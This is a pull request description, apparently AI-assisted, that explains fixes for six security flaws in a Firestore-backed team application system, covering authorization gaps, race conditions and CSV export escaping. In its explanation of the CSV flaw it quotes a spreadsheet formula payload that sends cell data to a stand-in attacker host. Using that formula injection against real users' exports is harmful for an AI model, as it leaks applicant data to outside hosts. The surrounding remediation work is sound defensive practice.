Static review of the API routes, guards and Firestore layer turned up 17 issues. This PR fixes the six that are exploitable or actively dangerous. IDs match the [review write-up](https://claude.ai/code/artifact/5c95440e-64e2-4e35-b8dc-92c3ef800124).

Worth stating up front: every mutation goes through the Admin SDK, which bypasses Firestore rules entirely. The route handler *is* the whole security boundary — there is nothing behind it. The comment on `sanitizeIncomingFormData` already records junk keys (`__internal_override`, `role`) found in live data, so somebody has been poking these endpoints by hand.

## Exploitable by any logged-in applicant

**F1 — applicants could set their own application status.** `PATCH /api/applications/[id]` destructured `status` from the body and wrote it with no enum check, so an applicant could set `accepted` while applications were open. The staff-side equivalent validates against the enum; this one didn't.

This chained: `POST /commit` gates on `status === ACCEPTED` alone, so the same applicant could later commit themselves onto a team and trigger the "new commitment" email to that system's leads. `respondToCommitment` was written correctly — it was just trusting a field an earlier endpoint let the applicant author.

Fixed by allowlisting to the two statuses an applicant owns, reusing the `EDITABLE_STATUSES` array already declared for the current-status check.

**F2 — staff review notes and tasks were reachable by non-staff.** `checkTeamAccess` never verified the caller was staff. Any role it doesn't name falls through to the closing `return null` — including `applicant`. The only remaining barrier was `userTeam !== application.team`.

That's a real account state, not a hypothetical: a member of one team applying to another has `role: applicant` and a `memberProfile` from their current team. They'd get access to every application on that team, with no system scoping at all — strictly more than a reviewer on that team has.

Seven handlers (notes, tasks) use this function as their only authorization; those four files contain no reference to `role` at all. The gate went into `checkTeamAccess` itself rather than seven call sites — `requireStaffForApplication` is the same team logic with `requireStaff()` in front of it, so this makes them consistent.

**F3 — application answers became live formulas in the CSV export.** `escapeCell` quoted correctly but didn't neutralize a leading `=`, `+`, `-`, `@`, tab or CR, which Excel and Sheets evaluate *after* the parser strips the quoting. An applicant writes `=HYPERLINK("https://evil.tld/?d="&A1,"Resume")` into a free-text answer and a reviewer opens the export. Leading apostrophe added.

## Needs staff access or an unlucky moment

**F4 — reviewers could score an applicant into another system's pool.** `system` arrived from the query string and request body unchecked and flowed straight into the scorecard document id and `updateAggregateRating`, so a reviewer with legitimate access could file a score against a different system and move its aggregate for that candidate.

This was in **both** `scorecard/route.ts` and `interview-scorecard/route.ts`, GET and POST — fixing only the one I originally found would have left the other open. New `resolveScorecardSystem` pins leads and reviewers to their own system and validates admin/captain requests against the team's system list.

Server-side only: the system switcher was already gated on `isPrivilegedUser`, so no non-privileged user has a UI path into the new 403. The normal reviewer flow is unchanged — the first fetch sends no `?system=`, the server resolves it to their own, and the client echoes that back.

**F5 — the decision-advance sweep could clobber a fresh commit.** `sweepOnDecisionAdvance` walked stale query snapshots issuing bare `update()` calls. A Firestore transaction only defends against other transactions; a bare update overwrites `respondToCommitment` regardless.

The interleaving: the sweep snapshots an application as `ACCEPTED` with no `commitment`; the applicant clicks Commit and the transaction writes `COMMITTED`; the sweep reaches that document seconds later still holding the stale snapshot and writes `REJECTED` / `autoRejected: offer_expired`. A committed member silently rejected, on the busiest day of the cycle.

Each write is now a transaction that re-reads the document and re-applies the pass's predicate. The predicate is extracted so the pre-filter and the re-check can't drift. Pass 2 had the same hazard in a subtler shape — a reneg landing mid-sweep turns one of the "other" applications into the one the applicant just committed to.

Also: sweep failures were caught and logged while the response still returned `success: true`, so a half-swept cycle looked clean. The admin now gets an error toast telling them to re-save the same step, which the sweep's re-triggerable design already supports.

**F6 — applicants could re-pick their interview system, including a cancelled one.** The handler never checked `selectedInterviewSystem`, and the offer guard only asked whether an offer *existed*, not whether it was still `PENDING`. Pick A (cancelling B), then pick B: both end up cancelled and `preferredSystems` narrows twice — and that array is what scopes reviewer visibility, so each re-pick hides the applicant from a system that may be mid-review.

Guarded in the route with a 400, and again inside `selectInterviewSystem`, which is now transactional like the other three writers of `interviewOffers` in that file. That also closes a lost update against `updateInterviewOfferStatus`, which was already transactional and being silently overwritten.

## Notes for review

- Verified with `npm run build` (the project's only typecheck). **Not yet exercised against a running app** — the emulator setup is in #40 and needs a JRE. Worth manually testing the sweep and the interview re-pick before merging.
- `escapeCell`'s character class includes `-`, which also prefixes negative numbers. Nothing in this export is negative (ratings are 1–5, counts and dates positive), so I kept the safer class rather than special-casing digits.
- F5 pass 2 doesn't re-check that the *outer* committed application is still committed. If an admin manually un-commits someone mid-sweep their other applications still get rejected — a different scenario from this one, left alone to keep the change scoped.
- F6's route still returns 500 for errors thrown out of `selectInterviewSystem`, so "that offer is no longer open" surfaces with a 500. The message reaches the user and the status code was already wrong, so I left it.
- One incidental fix: `originalPreferredSystems` was passed without a fallback and Firestore rejects `undefined`, so selecting a system on an application with no preferred systems would have thrown.

## Still open from the review

Not in this PR: **F7** seeder on `requireStaff` (one line), **F8** `preferredSystems` validation, **F9** `resumeUrl` origin check + iframe sandbox, **F10** captains moving themselves between teams. Plus seven lower-priority items in the write-up.

https://claude.ai/code/session_017SPJDwPKht9wedNLhWfpHa